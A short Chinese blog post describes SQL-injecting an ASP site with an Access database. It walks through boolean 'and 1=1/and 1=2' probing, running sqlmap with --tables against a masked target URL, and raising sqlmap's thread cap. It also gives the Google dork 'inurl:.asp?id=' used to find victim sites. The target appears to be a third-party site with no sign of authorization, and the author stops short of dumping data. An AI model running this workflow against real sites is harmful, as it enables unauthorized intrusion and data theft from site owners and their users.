SQLMAP注入Access数据库

今天偶遇一Access数据库

1.首先尝试是否存在注入点，and1=1,and 1=2,发现返回信息不一样

 

2.使用sqlmap脱裤，发现时Access数据库，不能提权，

3.那就直接暴库吧，sqlmap.py -u http://www.XXX.cc/common.asp?id=2%20and%201=2 --tables

期间因为线程太慢了，去配置文件改了一下线程

找到\lib\core\settings.py,打开文件，搜索MAX_NUMBER_OF_THREADS，将数值改为你想要的最大线程数。

5.接下来就该dump了，作为一个守法的好公民，就不继续了。

站点是google hacking 搜索出来的asp的站点

inurl:.asp?id=

 

 

以上内容只是作为自学记录。